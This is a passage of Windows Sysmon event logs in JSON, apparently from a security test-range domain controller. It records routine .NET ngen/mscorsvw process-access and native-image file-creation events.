{"EventTime":"2020-08-01 06:00:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:03.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E3-5F25-0000-0010A0951100}\r\nTargetProcessId: 4260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:03.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E3-5F25-0000-0010A0951100}","TargetProcessId":"4260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.028\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00103E9A1100}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.028","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00103E9A1100}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.028\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00103E9A1100}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.028","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00103E9A1100}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.028\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-00103E9A1100}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.028","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-00103E9A1100}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:04.059\r\nProcessGuid: {A837DB8D-04E4-5F25-0000-00103E9A1100}\r\nProcessId: 3524\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dc4-0\\System.Web.Abstractions.dll\r\nCreationUtcTime: 2020-08-01 06:00:04.059","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:04.059","ProcessGuid":"{A837DB8D-04E4-5F25-0000-00103E9A1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dc4-0\\System.Web.Abstractions.dll","CreationUtcTime":"2020-08-01 06:00:04.059","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.090\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-0010939D1100}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.090","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-0010939D1100}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.090\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-0010939D1100}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.090","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-0010939D1100}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.090\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-0010939D1100}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:04.090","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04E4-5F25-0000-0010939D1100}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:04.122\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E4-5F25-0000-0010E2A01100}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 